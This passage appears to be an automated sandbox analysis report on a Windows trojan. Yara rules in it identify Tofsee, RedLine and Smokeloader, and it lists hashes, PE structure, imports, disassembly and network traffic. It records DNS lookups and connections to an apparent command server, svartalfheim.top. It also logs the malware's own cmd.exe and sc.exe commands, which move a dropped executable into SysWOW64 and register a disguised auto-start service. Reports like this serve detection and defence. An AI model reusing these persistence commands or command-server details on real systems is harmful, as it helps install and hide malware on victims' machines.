                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):12343296
                                                                              Entropy (8bit):3.4208454596549234
                                                                              Encrypted:false
                                                                              SSDEEP:6144:4JMjbyLY3DuTsP8d2nQO0o7MFGU15Ts+XAW:4JMjbyM3DW8qQa5TsV
                                                                              MD5:D83D3102AEE8419201BF810DE2A41992
                                                                              SHA1:30EC9FD8B35C5FEC5366FE52C7BF77E57A0C67A2
                                                                              SHA-256:4F8B000276DE586232FC912CDB72B497C305E8E13A8DEF72D3A2B0BA2FB7E0C9
                                                                              SHA-512:F3E9CEF20B8751716F1426DCACDA675F2672F60FF55218CB4A9BEC141A736D2B12E8761BCFC7115CD5F46DF3E5A83F3D399BD110EF37000F31EAEABDAE3BDCA2
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................B.s.....p.....f..............w...a.....q.....t....Rich...........PE..L.....a.....................>......or............@........................................................................l...P...................................@...............................p9..@............................................text............................... ..`.data...0........8..................@....rsrc............ ..................@..@.reloc..n'.......x..................@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                              \Device\ConDrv

                                                                              Download File
                                                                              Process:C:\Windows\SysWOW64\netsh.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):3773
                                                                              Entropy (8bit):4.7109073551842435
                                                                              Encrypted:false
                                                                              SSDEEP:48:VHILZNfrI7WFY32iIiNOmV/HToZV9It199hiALlIg39bWA1RvTBi/g2eB:VoLr0y9iIiNOoHTou7bhBlIydWALLt2w
                                                                              MD5:DA3247A302D70819F10BCEEBAF400503
                                                                              SHA1:2857AA198EE76C86FC929CC3388A56D5FD051844
                                                                              SHA-256:5262E1EE394F329CD1F87EA31BA4A396C4A76EDC3A87612A179F81F21606ABC8
                                                                              SHA-512:48FFEC059B4E88F21C2AA4049B7D9E303C0C93D1AD771E405827149EDDF986A72EF49C0F6D8B70F5839DCDBD6B1EA8125C8B300134B7F71C47702B577AD090F8
                                                                              Malicious:false
                                                                              Preview:..A specified value is not valid.....Usage: add rule name=<string>.. dir=in|out.. action=allow|block|bypass.. [program=<program path>].. [service=<service short name>|any].. [description=<string>].. [enable=yes|no (default=yes)].. [profile=public|private|domain|any[,...]].. [localip=any|<IPv4 address>|<IPv6 address>|<subnet>|<range>|<list>].. [remoteip=any|localsubnet|dns|dhcp|wins|defaultgateway|.. <IPv4 address>|<IPv6 address>|<subnet>|<range>|<list>].. [localport=0-65535|<port range>[,...]|RPC|RPC-EPMap|IPHTTPS|any (default=any)].. [remoteport=0-65535|<port range>[,...]|any (default=any)].. [protocol=0-255|icmpv4|icmpv6|icmpv4:type,code|icmpv6:type,code|.. tcp|udp|any (default=any)].. [interfacetype=wireless|lan|ras|any].. [rmtcomputergrp=<SDDL string>].. [rmtusrgrp=<SDDL string>].. [edge=yes|deferapp|deferuser|no (default=no)].. [security=authenticate|authenc|authdynenc|authnoencap|

                                                                              Static File Info

                                                                              General

                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Entropy (8bit):7.033590531786374
                                                                              TrID:
                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                              File name:file.exe
                                                                              File size:198656
                                                                              MD5:546a040e4479958f7c6b862dead9a269
                                                                              SHA1:69a99c8f2fbfc316140690be348d6b54d6c01d7d
                                                                              SHA256:229d8701db31564e7eccab699121e96fe75d70896daa87323e9c59da3be74be0
                                                                              SHA512:459623eced397b36d3bbb5fa01d78789a172f16c72bffaa58f7ffda59ce3378f2c5a4c8e4c7f1a3864ac6469c0c3e51b5cab21ed10f22d2c379e5bb893a84f0b
                                                                              SSDEEP:6144:1JMjbyLY3DuTsP8d2nQO0o7MFGU15Ts+XAW:1JMjbyM3DW8qQa5TsV
                                                                              TLSH:8F14CF323A90C072C17B15745C64DAA56BBEB83046B9C9BB776807BE4F306D1523A37B
                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................B.s.......p.......f.................w.....a.......q.......t.....Rich............PE..L......a...................

                                                                              File Icon

                                                                              Icon Hash:70d0eeeacacaeadd

                                                                              Static PE Info

                                                                              General

                                                                              Entrypoint:0x40726f
                                                                              Entrypoint Section:.text
                                                                              Digitally signed:false
                                                                              Imagebase:0x400000
                                                                              Subsystem:windows gui
                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                              DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                              Time Stamp:0x61B896C8 [Tue Dec 14 13:06:16 2021 UTC]
                                                                              TLS Callbacks:
                                                                              CLR (.Net) Version:
                                                                              OS Version Major:5
                                                                              OS Version Minor:0
                                                                              File Version Major:5
                                                                              File Version Minor:0
                                                                              Subsystem Version Major:5
                                                                              Subsystem Version Minor:0
                                                                              Import Hash:87e1f4e32d01d5a52e605f27fd138118

                                                                              Entrypoint Preview

                                                                              Instruction
                                                                              call 00007F13A86C951Ch
                                                                              jmp 00007F13A86C2E8Eh
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              mov ecx, dword ptr [esp+04h]
                                                                              test ecx, 00000003h
                                                                              je 00007F13A86C3036h
                                                                              mov al, byte ptr [ecx]
                                                                              add ecx, 01h
                                                                              test al, al
                                                                              je 00007F13A86C3060h
                                                                              test ecx, 00000003h
                                                                              jne 00007F13A86C3001h
                                                                              add eax, 00000000h
                                                                              lea esp, dword ptr [esp+00000000h]
                                                                              lea esp, dword ptr [esp+00000000h]
                                                                              mov eax, dword ptr [ecx]
                                                                              mov edx, 7EFEFEFFh
                                                                              add edx, eax
                                                                              xor eax, FFFFFFFFh
                                                                              xor eax, edx
                                                                              add ecx, 04h
                                                                              test eax, 81010100h
                                                                              je 00007F13A86C2FFAh
                                                                              mov eax, dword ptr [ecx-04h]
                                                                              test al, al
                                                                              je 00007F13A86C3044h
                                                                              test ah, ah
                                                                              je 00007F13A86C3036h
                                                                              test eax, 00FF0000h
                                                                              je 00007F13A86C3025h
                                                                              test eax, FF000000h
                                                                              je 00007F13A86C3014h
                                                                              jmp 00007F13A86C2FDFh
                                                                              lea eax, dword ptr [ecx-01h]
                                                                              mov ecx, dword ptr [esp+04h]
                                                                              sub eax, ecx
                                                                              ret
                                                                              lea eax, dword ptr [ecx-02h]
                                                                              mov ecx, dword ptr [esp+04h]
                                                                              sub eax, ecx
                                                                              ret
                                                                              lea eax, dword ptr [ecx-03h]
                                                                              mov ecx, dword ptr [esp+04h]
                                                                              sub eax, ecx
                                                                              ret
                                                                              lea eax, dword ptr [ecx-04h]
                                                                              mov ecx, dword ptr [esp+04h]
                                                                              sub eax, ecx
                                                                              ret
                                                                              cmp ecx, dword ptr [0042C320h]
                                                                              jne 00007F13A86C3014h
                                                                              rep ret
                                                                              jmp 00007F13A86C950Ch
                                                                              push eax
                                                                              push dword ptr fs:[00000000h]
                                                                              lea eax, dword ptr [esp+0Ch]
                                                                              sub esp, dword ptr [esp+0Ch]
                                                                              push ebx
                                                                              push esi
                                                                              push edi
                                                                              mov dword ptr [eax], ebp
                                                                              mov ebp, eax
                                                                              mov eax, dword ptr [0042C320h]

                                                                              Rich Headers

                                                                              Programming Language:
                                                                              • [ASM] VS2008 build 21022
                                                                              • [ C ] VS2008 build 21022
                                                                              • [IMP] VS2005 build 50727
                                                                              • [C++] VS2008 build 21022
                                                                              • [RES] VS2008 build 21022
                                                                              • [LNK] VS2008 build 21022

                                                                              Data Directories

                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x1876c0x50.text
                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x15a0000x1ee8.rsrc
                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x15c0000xf10.reloc
                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x12400x1c.text
                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x39700x40.text
                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x10000x1f4.text
                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                              Sections

                                                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                              .text0x10000x1831a0x18400False0.5320050740979382data6.368267998766109IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                              .data0x1a0000x13f4300x13800False0.9405548878205128data7.828510878154685IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                              .rsrc0x15a0000x1ee80x2000False0.6080322265625data5.762900764852552IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              .reloc0x15c0000x276e0x2800False0.32080078125data3.3362844081949086IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                              Resources

                                                                              NameRVASizeTypeLanguageCountry
                                                                              RT_ICON0x15a1c00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TibetanTibet
                                                                              RT_ICON0x15a1c00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TibetanNepal
                                                                              RT_ICON0x15a1c00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TibetanIndia
                                                                              RT_ICON0x15aa680x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TibetanTibet
                                                                              RT_ICON0x15aa680x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TibetanNepal
                                                                              RT_ICON0x15aa680x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TibetanIndia
                                                                              RT_STRING0x15bd900x4edataTibetanTibet
                                                                              RT_STRING0x15bd900x4edataTibetanNepal
                                                                              RT_STRING0x15bd900x4edataTibetanIndia
                                                                              RT_STRING0x15bde00x50dataTibetanTibet
                                                                              RT_STRING0x15bde00x50dataTibetanNepal
                                                                              RT_STRING0x15bde00x50dataTibetanIndia
                                                                              RT_STRING0x15be300xb6dataTibetanTibet
                                                                              RT_STRING0x15be300xb6dataTibetanNepal
                                                                              RT_STRING0x15be300xb6dataTibetanIndia
                                                                              RT_GROUP_ICON0x15bb100x22dataTibetanTibet
                                                                              RT_GROUP_ICON0x15bb100x22dataTibetanNepal
                                                                              RT_GROUP_ICON0x15bb100x22dataTibetanIndia
                                                                              RT_VERSION0x15bb380x258data

                                                                              Imports

                                                                              DLLImport
                                                                              KERNEL32.dllRequestWakeupLatency, CreateFileA, FindActCtxSectionStringA, WriteConsoleInputA, ClearCommBreak, WriteFile, FindFirstVolumeMountPointW, CreateDirectoryExA, LocalSize, WaitForMultipleObjects, ReadConsoleInputA, GetProcessId, FreeUserPhysicalPages, WriteConsoleOutputAttribute, DebugActiveProcessStop, GetLocaleInfoW, GetProcAddress, LocalAlloc, GetCommandLineW, GetBinaryTypeW, InterlockedExchange, OpenMutexW, GetConsoleTitleA, SearchPathA, FreeConsole, EndUpdateResourceA, GetLastError, GetProfileSectionA, SetConsoleCursorInfo, GetConsoleAliasW, CreateSemaphoreA, GlobalFlags, GetConsoleAliasesLengthA, FindResourceW, SetVolumeMountPointW, GetModuleHandleW, HeapAlloc, GetComputerNameA, GetCurrentProcessId, CreateNamedPipeA, EnumResourceLanguagesA, SetHandleInformation, _hwrite, CreateActCtxA, DeleteVolumeMountPointA, MoveFileWithProgressA, AddRefActCtx, WritePrivateProfileStringA, GetUserDefaultLangID, QueryMemoryResourceNotification, WaitForSingleObject, GetLongPathNameW, InterlockedDecrement, VerifyVersionInfoA, EnumCalendarInfoW, FindNextFileW, EnumTimeFormatsA, SetLastError, SetCriticalSectionSpinCount, WritePrivateProfileSectionA, LoadLibraryA, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, RaiseException, RtlUnwind, HeapFree, DeleteFileA, GetStartupInfoW, GetModuleHandleA, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, GetCurrentThreadId, HeapCreate, VirtualFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, VirtualAlloc, HeapReAlloc, Sleep, ExitProcess, GetStdHandle, GetModuleFileNameA, GetModuleFileNameW, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetHandleCount, GetFileType, GetStartupInfoA, QueryPerformanceCounter, GetTickCount, GetSystemTimeAsFileTime, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, HeapSize, InitializeCriticalSectionAndSpinCount, WideCharToMultiByte, LCMapStringA, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, GetConsoleCP, GetConsoleMode, FlushFileBuffers, SetFilePointer, CloseHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, SetStdHandle
                                                                              USER32.dllGetComboBoxInfo
                                                                              GDI32.dllGetTextFaceW

                                                                              Possible Origin

                                                                              Language of compilation systemCountry where language is spokenMap
                                                                              TibetanTibet
                                                                              TibetanNepal
                                                                              TibetanIndia

                                                                              Network Behavior

                                                                              Snort IDS Alerts

                                                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                              192.168.2.38.8.8.856924532023883 02/07/23-20:05:14.210188UDP2023883ET DNS Query to a *.top domain - Likely Hostile5692453192.168.2.38.8.8.8
                                                                              192.168.2.38.8.8.852387532023883 02/07/23-20:04:33.939091UDP2023883ET DNS Query to a *.top domain - Likely Hostile5238753192.168.2.38.8.8.8
                                                                              192.168.2.38.8.8.860625532023883 02/07/23-20:05:54.726769UDP2023883ET DNS Query to a *.top domain - Likely Hostile6062553192.168.2.38.8.8.8

                                                                              Network Port Distribution

                                                                              TCP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Feb 7, 2023 20:04:31.294190884 CET4970325192.168.2.3104.47.54.36
                                                                              Feb 7, 2023 20:04:31.428320885 CET2549703104.47.54.36192.168.2.3
                                                                              Feb 7, 2023 20:04:31.428772926 CET4970325192.168.2.3104.47.54.36
                                                                              Feb 7, 2023 20:04:31.429225922 CET4970325192.168.2.3104.47.54.36
                                                                              Feb 7, 2023 20:04:31.562918901 CET2549703104.47.54.36192.168.2.3
                                                                              Feb 7, 2023 20:04:31.565531969 CET2549703104.47.54.36192.168.2.3
                                                                              Feb 7, 2023 20:04:31.565643072 CET4970325192.168.2.3104.47.54.36
                                                                              Feb 7, 2023 20:04:31.566819906 CET2549703104.47.54.36192.168.2.3
                                                                              Feb 7, 2023 20:04:31.566896915 CET4970325192.168.2.3104.47.54.36
                                                                              Feb 7, 2023 20:04:34.049882889 CET49704443192.168.2.3176.124.192.220
                                                                              Feb 7, 2023 20:04:34.049942017 CET44349704176.124.192.220192.168.2.3
                                                                              Feb 7, 2023 20:04:34.050019979 CET49704443192.168.2.3176.124.192.220
                                                                              Feb 7, 2023 20:05:14.064105988 CET49704443192.168.2.3176.124.192.220
                                                                              Feb 7, 2023 20:05:14.064233065 CET44349704176.124.192.220192.168.2.3
                                                                              Feb 7, 2023 20:05:14.064335108 CET49704443192.168.2.3176.124.192.220
                                                                              Feb 7, 2023 20:05:14.562938929 CET49705443192.168.2.3176.124.192.220
                                                                              Feb 7, 2023 20:05:14.562999964 CET44349705176.124.192.220192.168.2.3
                                                                              Feb 7, 2023 20:05:14.563118935 CET49705443192.168.2.3176.124.192.220
                                                                              Feb 7, 2023 20:05:54.581402063 CET49705443192.168.2.3176.124.192.220
                                                                              Feb 7, 2023 20:05:54.581485033 CET44349705176.124.192.220192.168.2.3
                                                                              Feb 7, 2023 20:05:54.581589937 CET49705443192.168.2.3176.124.192.220
                                                                              Feb 7, 2023 20:05:55.068969965 CET49706443192.168.2.3176.124.192.220
                                                                              Feb 7, 2023 20:05:55.069030046 CET44349706176.124.192.220192.168.2.3
                                                                              Feb 7, 2023 20:05:55.069097042 CET49706443192.168.2.3176.124.192.220

                                                                              UDP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Feb 7, 2023 20:04:31.258358002 CET5799053192.168.2.38.8.8.8
                                                                              Feb 7, 2023 20:04:31.288695097 CET53579908.8.8.8192.168.2.3
                                                                              Feb 7, 2023 20:04:33.939090967 CET5238753192.168.2.38.8.8.8
                                                                              Feb 7, 2023 20:04:34.046056986 CET53523878.8.8.8192.168.2.3
                                                                              Feb 7, 2023 20:05:14.210187912 CET5692453192.168.2.38.8.8.8
                                                                              Feb 7, 2023 20:05:14.561336040 CET53569248.8.8.8192.168.2.3
                                                                              Feb 7, 2023 20:05:54.726768970 CET6062553192.168.2.38.8.8.8
                                                                              Feb 7, 2023 20:05:55.066458941 CET53606258.8.8.8192.168.2.3
                                                                              Feb 7, 2023 20:06:14.241579056 CET5113953192.168.2.38.8.8.8
                                                                              Feb 7, 2023 20:06:14.387082100 CET53511398.8.8.8192.168.2.3

                                                                              DNS Queries

                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                              Feb 7, 2023 20:04:31.258358002 CET192.168.2.38.8.8.80x9480Standard query (0)microsoft-com.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                              Feb 7, 2023 20:04:33.939090967 CET192.168.2.38.8.8.80xfd45Standard query (0)svartalfheim.topA (IP address)IN (0x0001)false
                                                                              Feb 7, 2023 20:05:14.210187912 CET192.168.2.38.8.8.80x9585Standard query (0)svartalfheim.topA (IP address)IN (0x0001)false
                                                                              Feb 7, 2023 20:05:54.726768970 CET192.168.2.38.8.8.80xc103Standard query (0)svartalfheim.topA (IP address)IN (0x0001)false
                                                                              Feb 7, 2023 20:06:14.241579056 CET192.168.2.38.8.8.80x64c0Standard query (0)microsoft-com.mail.protection.outlook.comA (IP address)IN (0x0001)false

                                                                              DNS Answers

                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                              Feb 7, 2023 20:04:31.288695097 CET8.8.8.8192.168.2.30x9480No error (0)microsoft-com.mail.protection.outlook.com104.47.54.36A (IP address)IN (0x0001)false
                                                                              Feb 7, 2023 20:04:31.288695097 CET8.8.8.8192.168.2.30x9480No error (0)microsoft-com.mail.protection.outlook.com40.93.207.1A (IP address)IN (0x0001)false
                                                                              Feb 7, 2023 20:04:31.288695097 CET8.8.8.8192.168.2.30x9480No error (0)microsoft-com.mail.protection.outlook.com52.101.40.29A (IP address)IN (0x0001)false
                                                                              Feb 7, 2023 20:04:31.288695097 CET8.8.8.8192.168.2.30x9480No error (0)microsoft-com.mail.protection.outlook.com40.93.207.2A (IP address)IN (0x0001)false
                                                                              Feb 7, 2023 20:04:31.288695097 CET8.8.8.8192.168.2.30x9480No error (0)microsoft-com.mail.protection.outlook.com104.47.53.36A (IP address)IN (0x0001)false
                                                                              Feb 7, 2023 20:04:34.046056986 CET8.8.8.8192.168.2.30xfd45No error (0)svartalfheim.top176.124.192.220A (IP address)IN (0x0001)false
                                                                              Feb 7, 2023 20:05:14.561336040 CET8.8.8.8192.168.2.30x9585No error (0)svartalfheim.top176.124.192.220A (IP address)IN (0x0001)false
                                                                              Feb 7, 2023 20:05:55.066458941 CET8.8.8.8192.168.2.30xc103No error (0)svartalfheim.top176.124.192.220A (IP address)IN (0x0001)false
                                                                              Feb 7, 2023 20:06:14.387082100 CET8.8.8.8192.168.2.30x64c0No error (0)microsoft-com.mail.protection.outlook.com40.93.207.2A (IP address)IN (0x0001)false
                                                                              Feb 7, 2023 20:06:14.387082100 CET8.8.8.8192.168.2.30x64c0No error (0)microsoft-com.mail.protection.outlook.com104.47.53.36A (IP address)IN (0x0001)false
                                                                              Feb 7, 2023 20:06:14.387082100 CET8.8.8.8192.168.2.30x64c0No error (0)microsoft-com.mail.protection.outlook.com104.47.54.36A (IP address)IN (0x0001)false
                                                                              Feb 7, 2023 20:06:14.387082100 CET8.8.8.8192.168.2.30x64c0No error (0)microsoft-com.mail.protection.outlook.com40.93.207.1A (IP address)IN (0x0001)false
                                                                              Feb 7, 2023 20:06:14.387082100 CET8.8.8.8192.168.2.30x64c0No error (0)microsoft-com.mail.protection.outlook.com52.101.40.29A (IP address)IN (0x0001)false

                                                                              SMTP Packets

                                                                              TimestampSource PortDest PortSource IPDest IPCommands
                                                                              Feb 7, 2023 20:04:31.565531969 CET2549703104.47.54.36192.168.2.3220 DM3NAM06FT007.mail.protection.outlook.com Microsoft ESMTP MAIL Service ready at Tue, 7 Feb 2023 19:04:30 +0000

                                                                              Statistics

                                                                              CPU Usage

                                                                              Click to jump to process

                                                                              Memory Usage

                                                                              Click to jump to process

                                                                              High Level Behavior Distribution

                                                                              Click to dive into process behavior distribution

                                                                              Behavior

                                                                              Click to jump to process

                                                                              System Behavior

                                                                              General

                                                                              Target ID:0
                                                                              Start time:20:04:09
                                                                              Start date:07/02/2023
                                                                              Path:C:\Users\user\Desktop\file.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\Desktop\file.exe
                                                                              Imagebase:0x400000
                                                                              File size:198656 bytes
                                                                              MD5 hash:546A040E4479958F7C6B862DEAD9A269
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                              • Rule: MALWARE_Win_Tofsee, Description: Detects Tofsee, Source: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                                                              • Rule: Windows_Trojan_Tofsee_26124fe4, Description: unknown, Source: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: unknown
                                                                              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.290625632.00000000007B6000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                              • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                              • Rule: Windows_Trojan_Tofsee_26124fe4, Description: unknown, Source: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                              • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000000.00000003.279056535.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: MALWARE_Win_Tofsee, Description: Detects Tofsee, Source: 00000000.00000003.279056535.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                              • Rule: Windows_Trojan_Tofsee_26124fe4, Description: unknown, Source: 00000000.00000003.279056535.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                              Reputation:low

                                                                              General

                                                                              Target ID:1
                                                                              Start time:20:04:17
                                                                              Start date:07/02/2023
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                              Imagebase:0x7ff651c80000
                                                                              File size:51288 bytes
                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              General

                                                                              Target ID:2
                                                                              Start time:20:04:17
                                                                              Start date:07/02/2023
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:c:\windows\system32\svchost.exe -k unistacksvcgroup
                                                                              Imagebase:0x7ff651c80000
                                                                              File size:51288 bytes
                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              General

                                                                              Target ID:3
                                                                              Start time:20:04:17
                                                                              Start date:07/02/2023
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\htdzdeug\
                                                                              Imagebase:0xb0000
                                                                              File size:232960 bytes
                                                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              General

                                                                              Target ID:4
                                                                              Start time:20:04:17
                                                                              Start date:07/02/2023
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff745070000
                                                                              File size:625664 bytes
                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              General

                                                                              Target ID:5
                                                                              Start time:20:04:18
                                                                              Start date:07/02/2023
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                                                                              Imagebase:0x7ff651c80000
                                                                              File size:51288 bytes
                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              General

                                                                              Target ID:6
                                                                              Start time:20:04:18
                                                                              Start date:07/02/2023
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\qbxctmyn.exe" C:\Windows\SysWOW64\htdzdeug\
                                                                              Imagebase:0xb0000
                                                                              File size:232960 bytes
                                                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language

                                                                              General

                                                                              Target ID:7
                                                                              Start time:20:04:18
                                                                              Start date:07/02/2023
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff745070000
                                                                              File size:625664 bytes
                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language

                                                                              General

                                                                              Target ID:8
                                                                              Start time:20:04:18
                                                                              Start date:07/02/2023
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                                                                              Imagebase:0x7ff651c80000
                                                                              File size:51288 bytes
                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language

                                                                              General

                                                                              Target ID:9
                                                                              Start time:20:04:19
                                                                              Start date:07/02/2023
                                                                              Path:C:\Windows\SysWOW64\sc.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\System32\sc.exe" create htdzdeug binPath= "C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exe /d\"C:\Users\user\Desktop\file.exe\"" type= own start= auto DisplayName= "wifi support
                                                                              Imagebase:0xca0000
                                                                              File size:60928 bytes
                                                                              MD5 hash:24A3E2603E63BCB9695A2935D3B24695
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language

                                                                              General

                                                                              Target ID:10
                                                                              Start time:20:04:19
                                                                              Start date:07/02/2023
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff745070000
                                                                              File size:625664 bytes
                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language

                                                                              General

                                                                              Target ID:11
                                                                              Start time:20:04:19
                                                                              Start date:07/02/2023
                                                                              Path:C:\Windows\System32\svchost.exe
